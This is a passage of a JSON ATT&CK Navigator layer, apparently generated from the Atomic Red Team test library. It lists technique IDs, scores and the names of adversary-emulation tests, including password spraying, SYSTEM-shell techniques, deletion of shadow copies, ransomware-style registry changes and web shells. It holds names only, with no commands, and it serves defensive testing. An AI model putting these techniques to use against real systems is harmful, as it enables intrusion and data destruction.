Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":10,"enabled":true,"comment":"\n- Admin Account Manipulate\n- Domain Account and Group Manipulate\n- Password Change on Directory Service Restore Mode (DSRM) Account\n- Domain Password Policy Check: Short Password\n- Domain Password Policy Check: No Number in Password\n- Domain Password Policy Check: No Special Character in Password\n- Domain Password Policy Check: No Uppercase Character in Password\n- Domain Password Policy Check: No Lowercase Character in Password\n- Domain Password Policy Check: Only Two Character Classes\n- Domain Password Policy Check: Common Password Use\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":21,"enabled":true,"comment":"\n- certutil download (urlcache)\n- certutil download (verifyctl)\n- Windows - BITSAdmin BITS Download\n- Windows - PowerShell Download\n- OSTAP Worming Activity\n- svchost writing a file to a UNC path\n- Download a File with Windows Defender MpCmdRun.exe\n- File Download via PowerShell\n- File download with finger.exe on Windows\n- Download a file with IMEWDBLD.exe\n- Curl Download File\n- Curl Upload File\n- Download a file with Microsoft Connection Manager Auto-Download\n- MAZE Propagation Script\n- Printer Migration Command-Line Tool UNC share folder into a zip file\n- Lolbas replace.exe use to copy file\n- Lolbas replace.exe use to copy UNC file\n- certreq download\n- Download a file using wscript\n- Nimgrab - Transfer Files\n- iwr or Invoke Web-Request download\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":4,"enabled":true,"comment":"\n- Execution through API - CreateProcess\n- WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":3,"enabled":true,"comment":"\n- Brute Force Credentials of single Active Directory domain users via SMB\n- Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)\n- Password Brute User using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"comment":"\n- Password Cracking with Hashcat\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":6,"enabled":true,"comment":"\n- Password Spray all Domain Users\n- Password Spray (DomainPasswordSpray)\n- Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos)\n- WinPwn - DomainPasswordSpray Attacks\n- Password Spray Invoke-DomainPasswordSpray Light\n- Password Spray using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":1,"enabled":true,"comment":"\n- Brute Force:Credential Stuffing using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":60,"enabled":true,"comment":"\n- Modify Registry of Current User Profile - cmd\n- Modify Registry of Local Machine - cmd\n- Modify registry to store logon credentials\n- Add domain to Trusted sites Zone\n- Javascript in registry\n- Change Powershell Execution Policy to Bypass\n- BlackByte Ransomware Registry Changes - CMD\n- BlackByte Ransomware Registry Changes - Powershell\n- Disable Windows Registry Tool\n- Disable Windows CMD application\n- Disable Windows Task Manager application\n- Disable Windows Notification Center\n- Disable Windows Shutdown Button\n- Disable Windows LogOff Button\n- Disable Windows Change Password Feature\n- Disable Windows Lock Workstation Feature\n- Activate Windows NoDesktop Group Policy Feature\n- Activate Windows NoRun Group Policy Feature\n- Activate Windows NoFind Group Policy Feature\n- Activate Windows NoControlPanel Group Policy Feature\n- Activate Windows NoFileMenu Group Policy Feature\n- Activate Windows NoClose Group Policy Feature\n- Activate Windows NoSetTaskbar Group Policy Feature\n- Activate Windows NoTrayContextMenu Group Policy Feature\n- Activate Windows NoPropertiesMyDocuments Group Policy Feature\n- Hide Windows Clock Group Policy Feature\n- Windows HideSCAHealth Group Policy Feature\n- Windows HideSCANetwork Group Policy Feature\n- Windows HideSCAPower Group Policy Feature\n- Windows HideSCAVolume Group Policy Feature\n- Windows Modify Show Compress Color And Info Tip Registry\n- Windows Powershell Logging Disabled\n- Windows Add Registry Value to Load Service in Safe Mode without Network\n- Windows Add Registry Value to Load Service in Safe Mode with Network\n- Disable Windows Toast Notifications\n- Disable Windows Security Center Notifications\n- Suppress Win Defender Notifications\n- Allow RDP Remote Assistance Feature\n- NetWire RAT Registry Key Creation\n- Ursnif Malware Registry Key Creation\n- Terminal Server Client Connection History Cleared\n- Disable Windows Error Reporting Settings\n- DisallowRun Execution Of Certain Applications\n- Enabling Restricted Admin Mode via Command_Prompt\n- Mimic Ransomware - Enable Multiple User Sessions\n- Mimic Ransomware - Allow Multiple RDP Sessions per User\n- Event Viewer Registry Modification - Redirection URL\n- Event Viewer Registry Modification - Redirection Program\n- Enabling Remote Desktop Protocol via Remote Registry\n- Disable Win Defender Notification\n- Disable Windows OS Auto Update\n- Disable Windows Auto Reboot for current logon user\n- Windows Auto Update Option to Notify before download\n- Do Not Connect To Win Update\n- Tamper Win Defender Protection\n- Snake Malware Registry Blob\n- Allow Simultaneous Download Registry\n- Modify Internet Zone Protocol Defaults in Current User Registry - cmd\n- Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell\n- Activities To Disable Secondary Authentication Detected By Modified Registry Value.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":2,"enabled":true,"comment":"\n- Windows Screencapture\n- Windows Screen Capture (CopyFromScreen)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"comment":"\n- Email Collection with PowerShell Get-Inbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1115","score":3,"enabled":true,"comment":"\n- Utilize Clipboard to store or execute commands from\n- Execute Commands from Clipboard using PowerShell\n- Collect Clipboard Data via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"comment":"\n- Automated Collection Command Prompt\n- Automated Collection PowerShell\n- Recon information for export with PowerShell\n- Recon information for export with Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"comment":"\n- Win32_PnPEntity Hardware Inventory\n- WinPwn - printercheck\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":2,"enabled":true,"comment":"\n- using device audio capture commandlet\n- Registry artefact when application use microphone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":4,"enabled":true,"comment":"\n- System Time Discovery\n- System Time Discovery - PowerShell\n- System Time Discovery W32tm as a Delay\n- System Time with Windows time Command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"comment":"\n- Registry artefact when application use webcam\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}],"comment":"\n- Lolbin Jsc.exe compile javascript to exe\n- Lolbin Jsc.exe compile javascript to dll\n"},{"techniqueID":"T1127.001","score":2,"enabled":true,"comment":"\n- MSBuild Bypass Using Inline Tasks (C#)\n- MSBuild Bypass Using Inline Tasks (VB)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1132","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":1,"enabled":true,"comment":"\n- XOR Encoded data.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"comment":"\n- Running Chrome VPN Extensions via the Registry 2 vpn extension\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"comment":"\n- Named pipe client impersonation\n- `SeDebugPrivilege` token duplication\n- Launch NSudo Executable\n- Bad Potato\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"comment":"\n- Access Token Manipulation\n- WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"comment":"\n- Parent PID Spoofing using PowerShell\n- Parent PID Spoofing - Spawn from Current Process\n- Parent PID Spoofing - Spawn from Specified Process\n- Parent PID Spoofing - Spawn from svchost.exe\n- Parent PID Spoofing - Spawn from New Process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"comment":"\n- Injection SID-History with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":7,"enabled":true,"comment":"\n- Network Share Discovery command prompt\n- Network Share Discovery PowerShell\n- View available share drives\n- Share Discovery with PowerView\n- PowerView ShareFinder\n- WinPwn - shareenumeration\n- Network Share Discovery via dir command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":4,"enabled":true,"comment":"\n- Create a new user in a command prompt\n- Create a new user in PowerShell\n- Create a new Windows admin user\n- Create a new Windows admin user via .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":3,"enabled":true,"comment":"\n- Create a new Windows domain admin user\n- Create a new account similar to ANONYMOUS LOGON\n- Create a new Domain Account using PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1137","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}],"comment":"\n- Office Application Startup - Outlook as a C2\n"},{"techniqueID":"T1137.002","score":1,"enabled":true,"comment":"\n- Office Application Startup Test Persistence (HKCU)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"comment":"\n- Install Outlook Home Page Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"comment":"\n- Code Executed Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Word Add-in File (WLL)\n- Persistent Code Execution Via Excel VBA Add-in File (XLAM)\n- Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":2,"enabled":true,"comment":"\n- Deobfuscate/Decode Files Or Information\n- Certutil Rename and Decode\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"comment":"\n- Chrome/Chromium (Developer Mode)\n- Chrome/Chromium (Chrome Web Store)\n- Firefox\n- Edge Chromium Addon - VPN\n- Google Chrome Load Unpacked Extension With Command Line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"comment":"\n- PetitPotam\n- WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"comment":"\n- Octopus Scanner Malware Open Source Supply Chain\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"comment":"\n- Bitsadmin Download (cmd)\n- Bitsadmin Download (PowerShell)\n- Persist, Download, & Execute\n- Bits download using desktopimgdownldr.exe (cmd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":5,"enabled":true,"comment":"\n- Examine local password policy - Windows\n- Examine domain password policy - Windows\n- Get-DomainPolicy with PowerView\n- Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy\n- Use of SecEdit.exe to export the local security policy (including the password policy)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"comment":"\n- Indirect Command Execution - pcalua.exe\n- Indirect Command Execution - forfiles.exe\n- Indirect Command Execution - conhost.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"comment":"\n- OSTap Style Macro Execution\n- OSTap Payload Download\n- Maldoc choice flags command execution\n- OSTAP JS version\n- Office launching .bat file from AppData\n- Excel 4 Macro\n- Headless Chrome code execution via VBA\n- Potentially Unwanted Applications (PUA)\n- Office Generic Payload Download\n- LNK Payload Download\n- Mirror Blast Emulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"comment":"\n- Malicious Execution from Mounted ISO Image\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"comment":"\n- DCShadow (Active Directory)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}],"comment":"\n- SyncAppvPublishingServer Signed Script PowerShell Command Execution\n- manage-bde.wsf Signed Script Command Execution\n"},{"techniqueID":"T1216.001","score":1,"enabled":true,"comment":"\n- PubPrn.vbs Signed Script Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":4,"enabled":true,"comment":"\n- List Google Chrome / Opera Bookmarks on Windows with powershell\n- List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt\n- List Mozilla Firefox bookmarks on Windows with command prompt\n- List Internet Explorer Bookmarks using the command prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":76,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}],"comment":"\n- mavinject - Inject DLL into running process\n- Register-CimProvider - Execute evil dll\n- InfDefaultInstall.exe .inf Execution\n- ProtocolHandler.exe Downloaded a Suspicious File\n- Microsoft.Workflow.Compiler.exe Payload Execution\n- Renamed Microsoft.Workflow.Compiler.exe Payload Executions\n- Invoke-ATHRemoteFXvGPUDisablementCommand base test\n- DiskShadow Command Execution\n- Load Arbitrary DLL via Wuauclt (Windows Update Client)\n- Lolbin Gpscript logon option\n- Lolbin Gpscript startup option\n- Lolbas ie4uinit.exe use as proxy\n- LOLBAS CustomShellHost to Spawn Process\n- Provlaunch.exe Executes Arbitrary Command via Registry Key\n"},{"techniqueID":"T1218.001","score":8,"enabled":true,"comment":"\n- Compiled HTML Help Local Payload\n- Compiled HTML Help Remote Payload\n- Invoke CHM with default Shortcut Command Execution\n- Invoke CHM with InfoTech Storage Protocol Handler\n- Invoke CHM Simulate Double click\n- Invoke CHM with Script Engine and Help Topic\n- Invoke CHM Shortcut Command with ITS and Help Topic\n- Decompile Local CHM File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"comment":"\n- Control Panel Items\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"comment":"\n- CMSTP Executing Remote Scriptlet\n- CMSTP Executing UAC Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"comment":"\n- CheckIfInstallable method call\n- InstallHelper method call\n- InstallUtil class constructor method call\n- InstallUtil Install method call\n- InstallUtil Uninstall method call - /U variant\n- InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant\n- InstallUtil HelpText method call\n- InstallUtil evasive invocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"comment":"\n- Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject\n- Mshta executes VBScript to execute malicious command\n- Mshta Executes Remote HTML Application (HTA)\n- Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement\n- Invoke HTML Application - Jscript Engine Simulating Double Click\n- Invoke HTML Application - Direct download from URI\n- Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler\n- Invoke HTML Application - JScript Engine with Inline Protocol Handler\n- Invoke HTML Application - Simulate Lateral Movement over UNC Path\n- Mshta used to Execute PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"comment":"\n- Msiexec.exe - Execute Local MSI file with embedded JScript\n- Msiexec.exe - Execute Local MSI file with embedded VBScript\n- Msiexec.exe - Execute Local MSI file with an embedded DLL\n- Msiexec.exe - Execute Local MSI file with an embedded EXE\n- WMI Win32_Product Class - Execute Local MSI file with embedded JScript\n- WMI Win32_Product Class - Execute Local MSI file with embedded VBScript\n- WMI Win32_Product Class - Execute Local MSI file with an embedded DLL\n- WMI Win32_Product Class - Execute Local MSI file with an embedded EXE\n- Msiexec.exe - Execute the DllRegisterServer function of a DLL\n- Msiexec.exe - Execute the DllUnregisterServer function of a DLL\n- Msiexec.exe - Execute Remote MSI file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"comment":"\n- Odbcconf.exe - Execute Arbitrary DLL\n- Odbcconf.exe - Load Response File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"comment":"\n- Regasm Uninstall Method Call Test\n- Regsvcs Uninstall Method Call Test\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"comment":"\n- Regsvr32 local COM scriptlet execution\n- Regsvr32 remote COM scriptlet execution\n- Regsvr32 local DLL execution\n- Regsvr32 Registering Non DLL\n- Regsvr32 Silent DLL Install Call DllRegisterServer\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":13,"enabled":true,"comment":"\n- Rundll32 execute JavaScript Remote Payload With GetObject\n- Rundll32 execute VBscript command\n- Rundll32 execute VBscript command using Ordinal number\n- Rundll32 advpack.dll Execution\n- Rundll32 ieadvpack.dll Execution\n- Rundll32 syssetup.dll Execution\n- Rundll32 setupapi.dll Execution\n- Execution of HTA and VBS Files using Rundll32 and URL.dll\n- Launches an executable using Rundll32 and pcwutl.dll\n- Execution of non-dll using rundll32.exe\n- Rundll32 with Ordinal Value\n- Rundll32 with Control_RunDLL\n- Rundll32 with desk.cpl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":11,"enabled":true,"comment":"\n- TeamViewer Files Detected Test on Windows\n- AnyDesk Files Detected Test on Windows\n- LogMeIn Files Detected Test on Windows\n- GoToAssist Files Detected Test on Windows\n- ScreenConnect Application Download and Install on Windows\n- Ammyy Admin Software Execution\n- RemotePC Software Execution\n- NetSupport - RAT Execution\n- UltraViewer - RAT Execution\n- UltraVNC Execution\n- MSP360 Connect Execution\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"comment":"\n- MSXSL Bypass using local files\n- MSXSL Bypass using remote files\n- WMIC bypass using local XSL file\n- WMIC bypass using remote XSL file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"comment":"\n- WINWORD Remote Template Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"comment":"\n- Take ownership using takeown utility\n- cacls - Grant permission to specified user or group recursively\n- attrib - Remove read-only attribute\n- attrib - hide file\n- Grant Full Access to folder for Everyone - Ryuk Ransomware Style\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"comment":"\n- Windows - Discover domain trusts with dsquery\n- Windows - Discover domain trusts with nltest\n- Powershell enumerate domains and forests\n- Adfind - Enumerate Active Directory OUs\n- Adfind - Enumerate Active Directory Trusts\n- Get-DomainTrust with PowerView\n- Get-ForestTrust with PowerView\n- TruffleSnout - Listing AD Infrastructure\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"comment":"\n- LockBit Black - Modify Group policy settings -cmd\n- LockBit Black - Modify Group policy settings -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1485","score":2,"enabled":true,"comment":"\n- Windows - Overwrite file with SysInternals SDelete\n- Overwrite deleted data on C drive\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":2,"enabled":true,"comment":"\n- PureLocker Ransom Note\n- Data Encrypted with GPG4Win\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"comment":"\n- Windows - Stop service using Service Controller\n- Windows - Stop service using net.exe\n- Windows - Stop service by killing process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":10,"enabled":true,"comment":"\n- Windows - Delete Volume Shadow Copies\n- Windows - Delete Volume Shadow Copies via WMI\n- Windows - wbadmin Delete Windows Backup Catalog\n- Windows - Disable Windows Recovery Console Repair\n- Windows - Delete Volume Shadow Copies via WMI with PowerShell\n- Windows - Delete Backup Files\n- Windows - wbadmin Delete systemstatebackup\n- Windows - Disable the SR scheduled task\n- Disable System Restore Through Registry\n- Windows - vssadmin Resize Shadowstorage Volume\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"comment":"\n- Replace Desktop Wallpaper\n- Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1497","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":2,"enabled":true,"comment":"\n- Detect Virtualization Environment (Windows)\n- Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"comment":"\n- Install MS Exchange Transport Agent Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"comment":"\n- Web Shell Written to Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"comment":"\n- Install IIS Module using AppCmd.exe\n- Install IIS Module using PowerShell Cmdlet New-WebGlobalModule\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"comment":"\n- Simulate Patching termsrv.dll\n- Modify Terminal Services DLL Path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}],"comment":"\n- Find and Display Internet Explorer Browser Version\n- Applications Installed\n- WinPwn - Dotnetsearch\n- WinPwn - DotNet\n- WinPwn - powerSQL\n"},{"techniqueID":"T1518.001","score":7,"enabled":true,"comment":"\n- Security Software Discovery\n- Security Software Discovery - powershell\n- Security Software Discovery - Sysmon Service\n- Security Software Discovery - AV Discovery via WMI\n- Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets\n- Security Software Discovery - Windows Defender Enumeration\n- Security Software 